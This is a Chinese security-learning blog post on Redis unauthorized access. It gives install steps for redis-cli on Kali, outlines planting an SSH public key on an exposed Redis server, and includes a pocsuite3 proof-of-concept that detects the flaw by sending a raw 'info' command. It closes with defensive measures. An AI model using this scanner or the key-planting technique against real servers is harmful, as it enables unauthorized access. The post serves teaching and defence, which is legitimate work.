第五章5.1redis未授权访问漏洞

最新推荐文章于 2023-01-09 15:47:13 发布
最新推荐文章于 2023-01-09 15:47:13 发布
阅读量683 收藏
点赞数
分类专栏: python安全学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34640691/article/details/109078515
版权
本文详细介绍了Redis未授权访问漏洞,指出在安全配置中,由于逻辑缺陷导致其他用户可以无需权限访问敏感信息。同时提到了该漏洞常见于多种服务,如NFS、Samba等。在5.1.1部分,解释了如何使用kali的redis-cli进行检测,并探讨了ssh免密钥失败的可能原因。最后,提出了四点防御措施,包括限制高危命令、低权限运行、禁止外网访问和保护authorized_keys文件。
摘要由CSDN通过智能技术生成

5.1未授权访问漏洞

在安全配置,权限认证,授权页面存在逻辑缺陷,导致其他用户可以直接访问,从而引发权限可被操作,数据库网站等敏感信息写偶。目前存在未授权访问漏洞的服务包括:NFS,Samba,LDAP,Rsync,FTP,Gitlab,Jenkins,MongoDB,ZooKeeper等

5.1.1redis未授权访问漏洞介绍

kali下载按照redis客户端redis-cli

1.获取redis资源

  wget http://download.redis.io/releases/redis-4.0.8.tar.gz

2.解压

  tar xzvf redis-4.0.8.tar.gz

3.安装
  cd redis-4.0.8
  make
  cd src
  cp src/redis-cli /usr/local/bin/
  make install PREFIX=/usr/local/redis

4.移动配置文件到安装目录下

  cd ../

  mkdir /usr/local/redis/etc

  mv redis.conf /usr/local/redis/etc

1.先在kali生成ssh密钥,将公钥传入redis服务器在这里插入图片描述

ssh免密钥失败的原因

1.目录权限
.ssh目录权限id_rsa,id_rsa.pub
用户锁住的目录权限 700
2目标的ssh设置问题

pocsuite-poc
通过socket函数远程连接主机Ip和端口号,发送Payload,利用recvdata函数接受目标主机返回的数据。当返回的数据中含有’redis version’字符串,说明有漏洞

import socket
from pocsuite3.lib.utils import url2ip
from pocsuite3.api import POCBase, Output, register_poc, logger, POC_CATEGORY, VUL_TYPE


class DemoPOC(POCBase):		#实现类DemoPoc,继承自POCBase
    vulID = '1.1'
    version = '1.1'
    author = ['1']
    vulDate = '1.1'
    createDate = '2020/10/10'
    updateDate = '1.1'
    references = ['redis']
    name = 'redis_未授权访问'
    appPowerLink = 'redis'
    appName = 'redis_未授权访问'
    appVersion = '1'
    vulType = VUL_TYPE.CODE_EXECUTION
    desc = '''
        REDIS
    '''
    samples = ['']
    category = POC_CATEGORY.EXPLOITS.REMOTE
    protocol = POC_CATEGORY.PROTOCOL.REDIS

    def _verify(self):
        result = {}
        payload = b'\x2a\x31\x0d\x0a\x24\x34\x0d\x0a\x69\x6e\x66\x6f\x0d\x0a'
        s = socket.socket()
        socket.setdefaulttimeout(10)
        try:
            host = self.getg_option("rhost")
            port = self.getg_option("rport") or 6379
            s.connect((host, port))
            s.send(payload)
            recvdata = s.recv(1024)
            if recvdata and b'redis_version' in recvdata:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['Info'] = "Redis未授权访问"
                result['VerifyInfo']['URL'] = host
                result['VerifyInfo']['Port'] = port
        except Exception as ex:
            logger.error(str(ex))
        finally:
            s.close()
        return self.parse_verify(result)

    def parse_attack(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output

    def parse_verify(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output


register_poc(DemoPOC)

在这里插入图片描述
5.1.4防御措施
1)禁止远程使用高危命令
2)低权限运行redis服务
3)禁止外网访问redis
4)防止用户添加新的公钥,将authorized_keys权限设置为对拥有者只读

kongkong空
关注
专栏目录
服务攻防——数据库安全之授权访问、弱口令
m0_61506558的博客
12-14 617
关于判断服务是否开放进行信息收集的内容,可能通过扫描工具,如果遇到WAF的话,通过常用搭建网站的组件进行尝试,或者通过特定服务提供的报错信息进行判断......由于基于 Erlang 的 JSON 解析器和基于 JavaScript 的 JSON 解析器的差异,在 1.7.0 之前的 Apache CouchDB 和 2.1.1 之前的 2.x 中,可以提交_users具有重复键的文档,roles用于数据库内的访问控制,包括特例_admin角色,表示管理用户。
[红日安全]Web安全Day7 - 越权/非授权访问实战攻防
hongrisec的博客
03-02 1568
本文由红日安全成员: misakikata 编写,如有不当,还望斧正。 大家好,我们是红日安全-Web安全攻防小组。此项目是关于Web安全的系列文章分享,还包含一个HTB靶场供大家练习,我们给这个项目起了一个名字叫 Web安全实战 ,希望对想要学习Web安全的朋友们有所帮助。每一篇文章都是于基于漏洞简介-漏洞原理-漏洞危害-测试方法(手工测试,工具测试)-靶场测试(分为PHP靶场、JAVA靶场、P...
Redis 授权访问漏洞
MZLI_L的博客
11-08 3653
文章目录Redis授权访问漏洞利用写文件上传文件写计划任务(没有成功)额外遇到的问题Bind多个IP失败 Redis授权访问漏洞 简介 利用redis配置不当,或弱密码(反正就是能拿到redis的权限),然后利用redis做一系列操作。 利用 写文件 知识点 命令:CONFIG GET dir 获取数据库的存储路径(文件将会保存的地方,当然可以使用SET进行设置,如果有权限的话) 命令:CONFIG GET dbfilename 获取数据库文件名,默认是dump.rdb(通过SET设置为webshell
Redis 授权访问漏洞(附Python脚本)
09-21 818

 0x01 环境搭建
 
 #下载并安装
 cd /tmp
 wget http://download.redis.io/releases/redis-2.8.17.tar.gz
 tar xzf redis-2.8.17.tar.gz
 cd redis-2.8.17
 make
 #启动redis服...
Redis授权访问漏洞验证脚本编写(POC)
Mrs_H的博客
04-11 1554
Redis授权访问漏洞验证脚本编写(POC) 1.实验环境: Ubuntu18(靶机) kali linux(攻击机) 2.代码的编写: import sys import getopt import socket def url_exec(url):#将要探测的主机地址都存入一个待测数组内 ans = [] group = [] li = url.split(".") if (url.find('-') == -1): group.append(url
redis 授权访问漏洞
weixin_44769042的博客
11-01 747
漏洞复现记录--2 目录 一、实验相关配置 1.在靶机解压编译redis(编译需要gcc环境,yum -y install gcc) 2.进入提示的src目录安装redis 3.配置漏洞环境 4.攻击机主机发现 5.端口扫描(要关闭靶机防火墙 iptables -F) 6.版本信息扫描 7.攻击机安装redis 8.直接无密码连接 ./redis-cli -h 192.168.129.219 二、攻击姿势 1.利用redis写入webshell 2.使用crontab反弹she.
Redis授权访问漏洞
qq_50605865的博客
04-30 2187
Redis: 1、远程字典服务,记录,网站统计 2、数据类型以键值对存储 Redis常见用途: 1、缓存 2、分布式session、分布式锁、分布式全局ID 3、计数器、限流 4、列表 5、抽奖 6、标签 7、排行榜 …… Redis授权访问漏洞环境: 条件:服务器开启保护,允许本机以外的机器登录 机器均处于同一网段,相互可ping通,防火墙已关闭 目标靶机:centos7 IP地址:192.168.249.222 攻击机:redis-client IP地址:192.168.249.244 攻击机:
Redis安全加固】:Python保障Redis安全使用的最佳实践
![【Redis安全加固】:Python保障Redis安全使用的最佳实践]...Redis在默认配置下可能存在多个安全漏洞,如授权访问、数据泄露以及服务拒绝攻击等。因此,理解和掌握Redis的安全配置和防护措施对于任何使
20194307肖江宇Exp5—信息搜集与漏洞扫描
MYRLY的博客
04-21 362
20194307肖江宇Exp5—信息搜集与漏洞扫描 一、实践目标 掌握信息搜集的最基础技能与常用工具的使用方法 各种搜索技巧的应用 DNS IP注册信息的查询 基本的扫描技术:主机发现、端口扫描、OS及服务版本探测、具体服务的查点(以自己主机为目标) 漏洞扫描:会扫,会看报告,会查漏洞说明,会修补漏洞(以自己主机为目标) 二、实践内容 1. 各种搜索技巧的应用 (1) 搜索网址目录结构 msfconsole use auxiliary/scanner/http/dir_scanner set THR
Redis高效数据处理:掌握redis-py操作技巧提升性能
[python库文件学习之redis-py](https://static.javatpoint.com/python/images/how-to-use-redis-with-python5.png) # 1. Redis简介与核心概念 Redis(Remote Dictionary Server)是一个高性能的key-value数据库,它...
Redis 授权访问缺陷
热门推荐
我心如水
06-19 1万+
昨天接到一个开发朋友的求助说是有一个异常的进程占用了将近百分之800(8核)cpu使用率,于是登录服务器查看,确实有一个异常进程,通过ps查到了该进程调用的脚本,继而继续追踪后门定时任务,确实都存在,通过后门定时任务找到了攻击的最终源头,起因便是redis授权漏洞造成,下面公布一下该攻击脚本: export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/
Redis授权访问漏洞报告
ZYH_boss的博客
10-09 372
环境使用:kali、vulhub、burp suite(bp) 开始:打开vulhub,打开终端,进入root ifconfig查看ip地址 找到ip 为192.168.147.139 查看端口开放情况,7001开放 浏览器打开192.168.147.139:7001,发现404报错,是客户端错误,说明服务端开启的,只是访问失败 在后面加上/uddiexplorer/SearchPu...
Redis授权访问漏洞(一)先导篇
最新发布
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
01-09 1528
Redis默认情况下,会绑定在0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源ip访问等,这样将会将Redis服务暴露到公网上。如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下授权访问 Redis以及读取Redis的数据。
哪种修复redis授权访问漏洞的方法是相对不安全的_redis漏洞复现
weixin_39807691的博客
11-24 188
一、漏洞简介什么是redisredis是一个key-value存储系统。和Memcached类似,它支持存储的value类型相对更多,包括string(字符串)、list(链表)、set(集合)、zset(sorted set --有序集合)和hash(哈希类型)。这些数据类型都支持push/pop、add/remove及取交集并集和差集及更丰富的操作,而且这些操作都是原子性的。在此基础上,red...
redis授权访问总结
qq_45746681的博客
10-04 343
这里写自定义目录标题Centos搭建redisApache和php安装redis授权访问漏洞复现redis授权访问利用getshell方式利用定时任务进行反弹shell写入webshell方式进行连接redis授权访问的poc_*_ coding:utf-8 _*_ Centos搭建redis 首先,搭建redis,进行安装.以下为安装步骤: 1下载安装包命令为wget http://download.redis.io/releases/redis-2.8.17.tar.gz 2 tar xzvf
哪种修复redis授权访问漏洞的方法是相对不安全的_触目惊心,超过 8000+ 漏洞 Redis 暴露在云端!...
weixin_39616339的博客
11-23 93
Java技术栈www.javastack.cn关注阅读更多优质文章本文授权转载自:FreeBuf.COM参考来源:trendmicro,由Kriston编译研究人员在云端发现约8000个不安全的Redis,这些Redis使用TLS加密且设密码保护。Redis设计之初是在受信任环境中使用,如果允许其在互联网或物联网中使用,攻击者会利用不安全的Redis服务器来发起攻击,例如SQL注入,...
redis授权访问getshell
weixin_30567471的博客
12-12 160
redis授权访问的问题一年前就爆了,当时刚开始学安全,还不太懂。今天借着工作的机会来搞一把,看看能不能拿下一台服务器。其实前几天就写好了一直想找个实际环境复现一下,一直没有找到,只说下大致思路。 首先redis授权漏洞有几个先决条件,自己搭建漏洞环境的话需要在配置文件redis.conf中修改 1、允许其他网段连接 2、关闭protected-mode 漏洞的发现可以批量跑POC,...
Redis授权访问漏洞复现及修复方案
09-02 1229
首先,第一个复现Redis授权访问这个漏洞是有原因的,在 2019-07-24 的某一天,我同学的服务器突然特别卡,卡到连不上的那种,通过 top,free,netstat 等命令查看后发现,CPU占用200%,并且存在可疑进程,在很多目录下发现了可疑文件。经过排查后,确定为全盘感染的挖矿病毒,而可能的入口就是 Redis 的 6379 端口。 漏洞危害 Redis 在默认安装情况...
授权访问服务搭建
公众号shadow sock7
06-04 1944
influxdb安装 参考: https://v2.docs.influxdata.com/v2.0/get-started/ wget https://dl.influxdata.com/influxdb/releases/influxdb_2.0.0-beta.8_linux_amd64.tar.gz tar zxf influxdb_2.0.0-beta.8_linux_amd64.tar....
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值